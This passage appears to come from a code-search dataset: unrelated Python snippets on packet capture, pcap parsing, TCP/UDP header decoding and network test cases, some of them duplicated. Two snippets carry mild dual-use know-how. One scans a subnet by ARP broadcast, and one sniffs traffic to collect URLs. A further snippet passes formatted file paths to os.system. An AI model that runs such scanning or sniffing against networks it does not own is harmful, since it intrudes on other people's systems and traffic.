pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items())\n if type is 'clfter':\n if tunnel_pkt is 'gtpc':\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu':\n pkts = pkts_gtpc_pay\n return pkts", "def recv_raw(self) -> Dict[str, Any]:\n while True:\n try:\n packet = self.__recv_frame()\n except UnknownPacketException:\n continue\n\n # Hack for sniffing on localhost\n if packet['address']['interface'] == 'lo' and packet['address']['type'] != 4:\n continue\n\n if self.address and self.port:\n if (\n packet['ip_header']['source_address'] == self.address and\n packet['tcp_header']['source_port'] == self.port\n ):\n return packet\n if (\n packet['ip_header']['destination_address'] == self.address and\n packet['tcp_header']['destination_port'] == self.port\n ):\n return packet\n elif self.address:\n if (\n packet['ip_header']['source_address'] == self.address or\n packet['ip_header']['destination_address'] == self.address\n ):\n return packet\n elif self.port:\n if (\n packet['tcp_header']['source_port'] == self.port or\n packet['tcp_header']['destination_port'] == self.port\n ):\n return packet\n else:\n return packet", "def traffic_permutation(request):\n global AVP_MAC, NVP_MAC, UDP_SPORT, SRC_IP, OUTER_SRC_MAC,\\\n OUTER_DST_MAC, PKT_TYPE\n\n # Values common to all packet types\n AVP_MAC = MAC_A\n SRC_IP = H2_IP\n OUTER_SRC_MAC = HOST2_MAC\n OUTER_DST_MAC = SW_MAC\n\n # NVP_MAC updated based on pkt_type\n NVP_MAC_dict = {TrafficType.l2_basic: MAC_B,\n TrafficType.stp: STP_DEST_MAC,\n TrafficType.broadcast: BROADCAST_MAC,\n TrafficType.multicast: MULTICAST_MAC,\n TrafficType.lldp: LLDP_MAC}\n PKT_TYPE_dict = {TrafficType.l2_basic: 'l2_basic',\n TrafficType.stp: 'stp',\n TrafficType.broadcast: 'broadcast',\n TrafficType.multicast: 'multicast',\n TrafficType.lldp: 'lldp'}\n\n NVP_MAC = NVP_MAC_dict[request.param]\n PKT_TYPE = PKT_TYPE_dict[request.param]\n yield request.param", "def get_next_frame(self):\n if self.idx >= len(self.input_frames):\n try:\n key, self.input_frames = next(self.input_it)\n except StopIteration:\n return None, None\n\n self.idx = 0\n self.output_frames = self.output_dict[key]\n\n inputs = self.input_frames[self.idx]\n outputs = self.pfeats_map.phn_to_pfeats(self.output_frames[self.idx])\n self.idx += 1\n\n return inputs, outputs", "def flow_to_iter(flow):\n if ((sys.version_info.major == 3 and hasattr(flow, \"__next__\"))\n or (sys.version_info.major == 2 and hasattr(flow, \"next\"))):\n return flow\n else:\n return iter(flow)", "def test_traffic_paging_flow(self):\n # Need to delete all default flows in table 0 before\n # install the specific flows test case.\n self.classifier_controller._delete_all_flows()\n\n ue_ip_addr = \"192.168.128.30\"\n self.classifier_controller.install_paging_flow(\n 200,\n IPAddress(version=IPAddress.IPV4, address=ue_ip_addr.encode('utf-8')),\n True,\n )\n # Create a set of packets\n pkt_sender = ScapyPacketInjector(self.BRIDGE)\n eth = Ether(dst=self.MAC_1, src=self.MAC_2)\n ip = IP(src=self.Dst_nat, dst='192.168.128.30')\n o_udp = UDP(sport=2152, dport=2152)\n i_udp = 
UDP(sport=1111, dport=2222)\n i_tcp = TCP(seq=1, sport=1111, dport=2222)\n i_ip = IP(src='192.168.60.142', dst=self.EnodeB_IP)\n\n gtp_packet_udp = eth / ip / o_udp / GTP_U_Header(teid=0x1, length=28, gtp_type=255) / i_ip / i_udp\n gtp_packet_tcp = eth / ip / o_udp / GTP_U_Header(teid=0x1, length=68, gtp_type=255) / i_ip / i_tcp\n\n # Check if these flows were added (queries should return flows)\n flow_queries = [\n FlowQuery(\n self._tbl_num, self.testing_controller,\n match=MagmaMatch(tunnel_id=1, in_port=32768),\n ),\n FlowQuery(\n self._tbl_num, self.testing_controller,\n match=MagmaMatch(ipv4_dst='192.168.128.30'),\n ),\n ]\n # =========================== Verification ===========================\n # Verify 2 flows installed for classifier table (2 pkts matched)\n\n flow_verifier = FlowVerifier(\n [\n FlowTest(\n FlowQuery(\n self._tbl_num,\n self.testing_controller,\n ), 2, 2,\n ),\n ], lambda: wait_after_send(self.testing_controller),\n )\n\n snapshot_verifier = SnapshotVerifier(\n self, self.BRIDGE,\n self.service_manager,\n )\n\n with flow_verifier, snapshot_verifier:\n pkt_sender.send(gtp_packet_udp)\n pkt_sender.send(gtp_packet_tcp)\n\n flow_verifier.verify()", "def handle_tcp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n sequence_num = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n acknowledgment = int(pkt[start_point:start_point+8], 16)\r\n start_point += 8\r\n data_offset = int(pkt[start_point], 16) * 4\r\n start_point += 2\r\n flags = pkt[start_point:start_point+2]\r\n flags_str = \"\"\r\n for f in flags:\r\n flags_str += str(format(int(f), '04b'))\r\n start_point += 2\r\n window_size = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n start_point += 4\r\n urgent_pointer = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n options = int((2 * packets[i][0][0] - start_point)/2)\r\n\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(sequence_num)\r\n packets[i][2].append(acknowledgment)\r\n packets[i][2].append(data_offset)\r\n packets[i][2].append(flags_str)\r\n packets[i][2].append(window_size)\r\n packets[i][2].append(checksum_value)\r\n packets[i][2].append(urgent_pointer)\r\n packets[i][2].append(options)\r\n return packets", "def packetReceived(self, packet):\n for layer in packet:\n if (layer.layer_name == 'fmtp' and\n int(layer.type) == 1):\n # Data is stored as a hexadecimal string in the XML file\n # generated by tshark\n data = binascii.unhexlify(layer.data)\n log.msg(\"FMTP message received: {}\".format(data))", "def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):\n if batch_size is None:\n batch_size = self.batch_size\n if tile_one:\n batch = [self.data[self.ix]] * batch_size\n self.ix += 1\n if self.ix >= len(self.data):\n random.shuffle(self.data)\n self.ix -= len(self.data)\n else:\n batch = self.data[self.ix: self.ix+batch_size]\n if len(batch) < batch_size:\n random.shuffle(self.data)\n self.ix = batch_size - len(batch)\n batch += self.data[:self.ix]\n else:\n self.ix += batch_size\n self.batch = deepcopy(batch)\n \n self.start_list = []\n self.dest_list = []\n self.fake_start_list = []\n self.fake_dest_list = []\n\n \n for i,item in enumerate(self.batch):\n self.start_list.append(item['path'][0])\n self.dest_list.append(item['path'][-1])\n path_length = 
len(item['path'])\n scan = item['scan']\n fake_flag = True\n fail_flag = False\n goal_list = [goal for goal in self.paths[scan][self.start_list[-1]]]\n random.shuffle(goal_list)\n\n for goal in goal_list:\n if abs(path_length - len(self.paths[scan][self.start_list[-1]][goal])) < 1 and self.distances[scan][self.dest_list[-1]][goal] > 3:\n self.fake_dest_list.append(self.paths[scan][self.start_list[-1]][goal])\n # print('fake_dest',i)\n fake_flag = False\n break\n\n if fake_flag:\n fail_flag = True\n # print('fake dest error')\n self.fake_dest_list.append(item['path'])\n\n fake_flag = True\n goal_list = [goal for goal in self.paths[scan][self.dest_list[-1]]]\n random.shuffle(goal_list)\n\n for goal in goal_list:\n if abs(path_length - len(self.paths[scan][self.dest_list[-1]][goal])) < 1 and self.distances[scan][self.start_list[-1]][goal] > 3:\n self.fake_start_list.append(self.paths[scan][self.dest_list[-1]][goal])\n fake_flag = False\n break\n \n \n if fake_flag:\n fail_flag = True\n # print('fake start error')\n self.fake_start_list.append(item['path'])\n\n # print('scan',scan)\n\n if i != 0 and fail_flag:\n self.batch[i] = deepcopy(self.batch[i-1])\n self.start_list[-1] = self.start_list[-2]\n self.dest_list[-1] = self.dest_list[-2]\n self.fake_start_list[-1] = self.fake_start_list[-2]\n self.fake_dest_list[-1] = self.fake_dest_list[-2]\n \n\n # cnt_dest = 0\n # cnt_star = 0\n # scan = self.batch[i]['scan']\n # item = self.batch[i]\n # # print('scan after',scan)\n # fake_dest_path = self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]]\n # fake_star_path = self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]]\n # for p in item['path']:\n # if p in fake_dest_path:\n # cnt_dest += 1\n # if p in fake_star_path:\n # cnt_star += 1\n # dis_dest = self.distances[scan][item['path'][-1]][self.fake_dest_list[-1]]\n # dis_star = self.distances[scan][item['path'][0]][self.fake_start_list[-1]]\n # print('length',path_length,'fake dest',cnt_dest, 'fake start',cnt_star,'dis:','dest',dis_dest,'start',dis_star)\n\n # print('ori',item['path'])\n # print('des',self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]])\n # print('sta',self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]])\n # print('')", "def process(self, pkt):\n pass", "def itersessions(self):\n for x in np.unique(self.sessions):\n yield x, self.loc[self.sessions == x, :]", "def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):\n if batch_size is None:\n batch_size = self.batch_size\n if tile_one:\n batch = [self.data[self.ix]] * batch_size\n self.ix += 1\n if self.ix >= len(self.data):\n random.shuffle(self.data)\n self.ix -= len(self.data)\n else:\n batch = self.data[self.ix: self.ix+batch_size]\n if len(batch) < batch_size:\n random.shuffle(self.data)\n self.ix = batch_size - len(batch)\n batch += self.data[:self.ix]\n else:\n self.ix += batch_size\n self.batch = deepcopy(batch)\n \n self.start_list = []\n self.dest_list = []\n self.fake_start_list = []\n self.fake_dest_list = []\n\n \n for i,item in enumerate(self.batch):\n self.start_list.append(item['path'][0])\n self.dest_list.append(item['path'][-1])\n path_length = len(item['path'])\n scan = item['scan']\n fake_flag = True\n fail_flag = False\n goal_list = [goal for goal in self.paths[scan][self.start_list[-1]]]\n random.shuffle(goal_list)\n\n for goal in goal_list:\n if abs(path_length - len(self.paths[scan][self.start_list[-1]][goal])) < 1 and self.distances[scan][self.dest_list[-1]][goal] > 3:\n self.fake_dest_list.append(goal)\n 
# print('fake_dest',i)\n fake_flag = False\n break\n\n if fake_flag:\n fail_flag = True\n # print('fake dest error')\n self.fake_dest_list.append(item['path'][-1])\n\n fake_flag = True\n goal_list = [goal for goal in self.paths[scan][self.dest_list[-1]]]\n random.shuffle(goal_list)\n\n for goal in goal_list:\n if abs(path_length - len(self.paths[scan][self.dest_list[-1]][goal])) < 1 and self.distances[scan][self.start_list[-1]][goal] > 3:\n self.fake_start_list.append(goal)\n fake_flag = False\n break\n \n \n if fake_flag:\n fail_flag = True\n # print('fake start error')\n self.fake_start_list.append(item['path'][0])\n\n # print('scan',scan)\n\n if i != 0 and fail_flag:\n self.batch[i] = deepcopy(self.batch[i-1])\n self.start_list[-1] = self.start_list[-2]\n self.dest_list[-1] = self.dest_list[-2]\n self.fake_start_list[-1] = self.fake_start_list[-2]\n self.fake_dest_list[-1] = self.fake_dest_list[-2]\n \n\n # cnt_dest = 0\n # cnt_star = 0\n # scan = self.batch[i]['scan']\n # item = self.batch[i]\n # # print('scan after',scan)\n # fake_dest_path = self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]]\n # fake_star_path = self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]]\n # for p in item['path']:\n # if p in fake_dest_path:\n # cnt_dest += 1\n # if p in fake_star_path:\n # cnt_star += 1\n # dis_dest = self.distances[scan][item['path'][-1]][self.fake_dest_list[-1]]\n # dis_star = self.distances[scan][item['path'][0]][self.fake_start_list[-1]]\n # print('length',path_length,'fake dest',cnt_dest, 'fake start',cnt_star,'dis:','dest',dis_dest,'start',dis_star)\n\n # print('ori',item['path'])\n # print('des',self.paths[scan][self.start_list[-1]][self.fake_dest_list[-1]])\n # print('sta',self.paths[scan][self.fake_start_list[-1]][self.dest_list[-1]])\n # print('')", "def _get_next_packet(self):\n raise NotImplementedError(\"Do not instantiate csvAbstractReader directly.\")", "def parse_packet(linktype, packet):\n link_layer = parse_Ethernet(packet) if linktype == pcapy.DLT_EN10MB else parse_Cooked(packet)\n if link_layer['payload_type'] in ['IPv4', 'IPv6']:\n network_layer = parse_IPv4(link_layer['payload']) if link_layer['payload_type'] == 'IPv4' else parse_IPv6(link_layer['payload'])\n if network_layer['payload_type'] in ['UDP', 'TCP']:\n transport_layer = parse_UDP(network_layer['payload']) if network_layer['payload_type'] == 'UDP' else parse_TCP(network_layer['payload'])\n return (link_layer, network_layer, transport_layer)", "def process_pcap(pcap):\n\n print \"Processing\", pcap\n pcap_path, _ = os.path.splitext(pcap)\n # strip_payload_from_pcap(pcap)\n os.system(\"tshark -nn -T fields -E separator=/t -e frame.time_epoch\"\n \" -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport\"\n \" -e ip.proto -e ip.len -e ip.hdr_len -e tcp.hdr_len -e data.len\"\n \" -e tcp.flags -e tcp.options.timestamp.tsval\"\n \" -e tcp.options.timestamp.tsecr -e tcp.seq -e tcp.ack\"\n \" -e tcp.window_size_value -e expert.message \"\n \" -r %s > %s.tshark\" % (pcap, pcap_path))\n # tcpdump command from Panchenko's raw-to-tcp script\n os.system(\"\"\"tcpdump -r {0} -n -l -tt -q -v | sed -e 's/^[ ]*//' |\n awk '/length ([0-9][0-9]*)/{{printf \"%s \",$0;next}}{{print}}' > {1}\"\"\".\\\n format(pcap, pcap_path + '.tcpdump'))", "def get_next_output_packet(self):\n if self.num_packets != 0:\n return self.packet_buffer.pop(0)", "def get_current_drops(output):\n has_skipped_netem = False\n for line in output.split(\"\\n\"):\n # it looks like the tbf share a buffer\n # So, the we only need to recor the 
first one seen\n # break after the second one\n match = re.search(q_pattern, line)\n if (match):\n if (not has_skipped_netem):\n has_skipped_netem = True\n continue\n sent = int(match.group(\"sent\"))\n dropped = int(match.group(\"dropped\"))\n return (sent, dropped)", "def next(self):\n while True:\n source_next = self.source_iter.next() \n if self.filter_func is None or self.filter_func(source_next):\n if self.casting_func is not None:\n return self.casting_func(source_next)\n else:\n return source_next", "def process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[daddr, dport, saddr, sport][co.C2S] >= 0:\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.C2S][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[daddr, dport, saddr, sport][co.C2S]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.C2S][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if size_payload > 0 and tcp.seq in acks[daddr, dport, saddr, sport][SEQ_S2C]:\n # This is a retransmission!\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][0],\n ts_delta - acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1],\n ts_delta - acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER]))\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[daddr, dport, saddr, sport][SEQ_S2C].add(tcp.seq)\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[daddr, dport, saddr, sport][HSEQ_S2C][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[daddr, dport, saddr, sport][SEQ][co.S2C]) >= 3000000:\n# for x in range(50000):\n# acks[daddr, dport, saddr, sport][SEQ][co.S2C].popleft()\n\n acks[daddr, dport, saddr, sport][co.C2S] = tcp.ack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta", "def iterate(cls, disc, track_number):\n\n assert track_number >= 0 and track_number < len(disc.tracks)\n\n track = disc.tracks[track_number]\n\n packet_frame_size = (\n disc.audio_format.rate / cls.PACKETS_PER_SECOND)\n\n # Mock up a packet that ends at the start of index 1, so the\n # first packet generated starts at that position\n p = cls(disc, track, track_number, track.pregap_offset, 0)\n\n while True:\n # Calculate offsets of next packet\n abs_pos = p.abs_pos + p.length\n\n if abs_pos < track.pregap_offset:\n length = min(track.pregap_offset - abs_pos, packet_frame_size)\n else:\n length = min(track.length - abs_pos, packet_frame_size)\n\n assert length >= 0\n\n if length == 0:\n # Reached end of track, switch to next. 
Simplify this\n # code by generating a dummy packet for the next\n # iteration to work on (but don't yield it!)\n\n track_number += 1\n\n try:\n track = disc.tracks[track_number]\n except IndexError:\n # That was the last track, no more packets\n return\n\n p = cls(disc, track, track_number, 0, 0)\n\n else:\n # Generate next packet\n flags = 0\n if (track.pause_after\n and abs_pos + length == track.length\n and track_number + 1 < len(disc.tracks)):\n flags |= p.PAUSE_AFTER\n\n p = cls(disc, track, track_number, abs_pos, length, flags)\n yield p", "def final_repset_from_iteration_repsets(repset_fasta_fs):\r\n observed = {}\r\n for repset_fasta_f in repset_fasta_fs:\r\n for otu_id, seq in parse_fasta(repset_fasta_f):\r\n o = otu_id.split()[0]\r\n if not o in observed:\r\n yield (otu_id, seq)\r\n observed[o] = None\r\n else:\r\n # we already have a representative for this otu id\r\n pass", "def iterator_peek(iterator: Iterator[T], count: int) -> tuple[list[T], Iterator[T]]:\n\n ret = []\n for _ in range(count):\n try:\n ret.append(next(iterator))\n except StopIteration:\n break\n\n return ret, chain(ret, iterator)", "def process_mptcp_pkt_from_server(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n flow_id = acks[daddr, dport, saddr, sport][co.FLOW_ID]\n if conn_acks[conn_id][co.C2S] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.C2S]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_S2C] and (dss - conn_acks[conn_id][co.S2C]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.S2C][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission!\n mptcp_connections[conn_id].attr[co.S2C][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_S2C][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]))\n conn_acks[conn_id][HSEQ_S2C][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_S2C].add(dss)\n conn_acks[conn_id][HSEQ_S2C][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]]\n\n conn_acks[conn_id][co.C2S] = dack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][SERVER] = ts_delta", "def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for", "def print_info(self):\n \n i = 1\n for pcap_packet in self.pcap_packets:\n print '----------------frame: %d------------' % i\n i += 1\n pcap_packet.ethernet.print_info()\n \n #skip the packet that is not ip packet\n if (pcap_packet.ethernet.type != 'IP'):\n continue\n \n print '################# 
packet in the frame ################'\n pcap_packet.ip.print_info()\n \n #skp the packet that is not tcp message\n if (pcap_packet.ip.protocol != 'TCP'):\n continue\n \n print '@@@@@@@@@@@@@@@@@@@ tcp fields @@@@@@@@@@@@@@@@@@@@'\n pcap_packet.tcp.print_info()\n \n print\n #endof for", "def test_lru(self):\n\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n expire_walk_interval_ms=10000,\n )\n\n payload_len = 1000\n payload = \"\"\n counter = 0\n while len(payload) < payload_len:\n payload += \"%u \" % counter\n counter += 1\n\n packet_count = 10\n\n fragments = [\n f\n for i in range(packet_count)\n for p in (\n Ether(dst=self.src_if.local_mac, src=self.src_if.remote_mac)\n / IP(id=i, src=self.src_if.remote_ip4, dst=self.dst_if.remote_ip4)\n / UDP(sport=1234, dport=5678)\n / Raw(payload)\n )\n for f in fragment_rfc791(p, payload_len / 4)\n ]\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n c = self.dst_if.get_capture(len(fragments))\n for sent, recvd in zip(fragments, c):\n self.assertEqual(sent[IP].src, recvd[IP].src)\n self.assertEqual(sent[IP].dst, recvd[IP].dst)\n self.assertEqual(sent[Raw].payload, recvd[Raw].payload)", "def test_lru(self):\n\n self.vapi.ip_reassembly_set(\n timeout_ms=1000000,\n max_reassemblies=1,\n max_reassembly_length=1000,\n type=VppEnum.vl_api_ip_reass_type_t.IP_REASS_TYPE_SHALLOW_VIRTUAL,\n is_ip6=1,\n expire_walk_interval_ms=10000,\n )\n\n payload_len = 1000\n payload = \"\"\n counter = 0\n while len(payload) < payload_len:\n payload += \"%u \" % counter\n counter += 1\n\n packet_count = 10\n\n fragments = [\n f\n for i in range(packet_count)\n for p in (\n Ether(dst=self.src_if.local_mac, src=self.src_if.remote_mac)\n / IPv6(src=self.src_if.remote_ip6, dst=self.dst_if.remote_ip6)\n / UDP(sport=1234, dport=5678)\n / Raw(payload)\n )\n for f in fragment_rfc8200(p, i, payload_len / 4)\n ]\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n c = self.dst_if.get_capture(len(fragments))\n for sent, recvd in zip(fragments, c):\n self.assertEqual(sent[IPv6].src, recvd[IPv6].src)\n self.assertEqual(sent[IPv6].dst, recvd[IPv6].dst)\n self.assertEqual(sent[Raw].payload, recvd[Raw].payload)", "def __packetHandler(self, hdr, data):\n\t\tif self.quit: raise SystemExit('capture on interface stoped.')\n\n\t\tdecoded_data = self.decoder.decode(data)\n\t\t(src, dst, data) = self.__getHeaderInfo(decoded_data)\n\t\tfor item in regex_links.finditer(str(data)):\n\t\t\tif not item: continue\n\t\t\t#pos = item.start()\n\t\t\tlink = item.groups()[0]\n\t\t\t#self.buffer.append( (link,) )\n\t\t\tself.buffer.append( (link,src,dst,) )\t# append to internal buffer", "def process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[saddr, sport, daddr, dport][co.S2C] >= 0:\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.S2C][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[saddr, sport, daddr, dport][co.S2C]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.S2C][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n # If SOCKS command\n if size_payload == 7 and 
connections[conn_id].attr.get(co.SOCKS_PORT, None) is None:\n crypted_socks_cmd = tcp.data\n # This is possible because of packet stripping\n if len(crypted_socks_cmd) == 7:\n decrypted_socks_cmd = socks_parser.decode(crypted_socks_cmd)\n if decrypted_socks_cmd[0] == b'\\x01': # Connect\n connections[conn_id].attr[co.SOCKS_DADDR] = socks_parser.get_ip_address(decrypted_socks_cmd)\n connections[conn_id].attr[co.SOCKS_PORT] = socks_parser.get_port_number(decrypted_socks_cmd)\n\n if size_payload > 0 and tcp.seq in acks[saddr, sport, daddr, dport][SEQ_C2S]:\n # This is a retransmission! (take into account the seq overflow)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][0],\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1],\n ts_delta - acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT]))\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[saddr, sport, daddr, dport][SEQ_C2S].add(tcp.seq)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[saddr, sport, daddr, dport][SEQ][co.C2S]) >= 3000000:\n# for x in range(50000):\n# acks[saddr, sport, daddr, dport][SEQ][co.C2S].popleft()\n\n acks[saddr, sport, daddr, dport][co.S2C] = tcp.ack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta", "def test():\n with open('univ1_pt8.pcap', 'rb') as f: #univ1_trace/univ1_pt8\n pcap = Reader(f)\n print_packets(pcap)\n # top_flows()\n host_pairs()", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def get_all_flow(self, conf, dpid):\n\t\tpass", "def udp_pkt_cap(port=None, cnt=125):\n if not port:\n udp_port = 2368\n else:\n udp_port = port\n\n # type: udp socket\n udpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\n # Enable the SO_REUSEADDR option\n udpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n new_state = udpSocket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)\n # print(\"New sock state: %s\" % new_state)\n\n # bind socket\n try:\n udpSocket.bind((\"\", udp_port))\n udpSocket.settimeout(0.06)\n except socket.error as err_msg:\n print(\"Udp socket message:%s\" % err_msg)\n return\n\n udp_buf = 1304\n pkt_cnt = cnt\n messages = []\n while True:\n dat, add = udpSocket.recvfrom(udp_buf)\n if (dat[0:2] == b'\\xaa\\xaa') or (dat[0:2] == b'\\xbb\\xbb') or (dat[0:2] == b'\\xcc\\xcc'):\n # print(add[0], add[1], hex(ord(dat[2])) + '{:02x}'.format(ord(dat[3])) )\n # print(add[0], add[1], '0x{:02X} 0x{:02X}'.format(dat[2], dat[3]))\n print(\"Recv ok source ip and port is \", add)\n messages.append(dat + b'\\n')\n if pkt_cnt > 1:\n for _ in range(pkt_cnt - 1):\n datfrm, add = udpSocket.recvfrom(udp_buf)\n messages.append(datfrm + 
b'\\n')\n break\n else:\n break\n\n return messages # return string", "def scan(ip):\n arp_request = scapy.ARP(pdst=ip)\n broadcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp_request_broadcast = broadcast/arp_request\n answered_list = scapy.srp(arp_request_broadcast , timeout = 1, verbose=False)[0]\n target_list=[]\n for element in answered_list:\n target_dict = {\"ip\":element[1].psrc, \"mac\":element[1].hwsrc}\n target_list.append(target_dict)\n return target_list", "def testParse(self):\n parser = pcap.PcapParser()\n storage_writer = self._ParseFile(['test.pcap'], parser)\n\n # PCAP information:\n # Number of streams: 96 (TCP: 47, UDP: 39, ICMP: 0, Other: 10)\n #\n # For each stream 2 events are generated one for the start\n # and one for the end time.\n\n self.assertEqual(storage_writer.number_of_events, 192)\n\n events = list(storage_writer.GetEvents())\n\n # Test stream 3 (event 6).\n # Protocol: TCP\n # Source IP: 192.168.195.130\n # Dest IP: 63.245.217.43\n # Source Port: 1038\n # Dest Port: 443\n # Stream Type: SSL\n # Starting Packet: 4\n # Ending Packet: 6\n\n event = events[6]\n 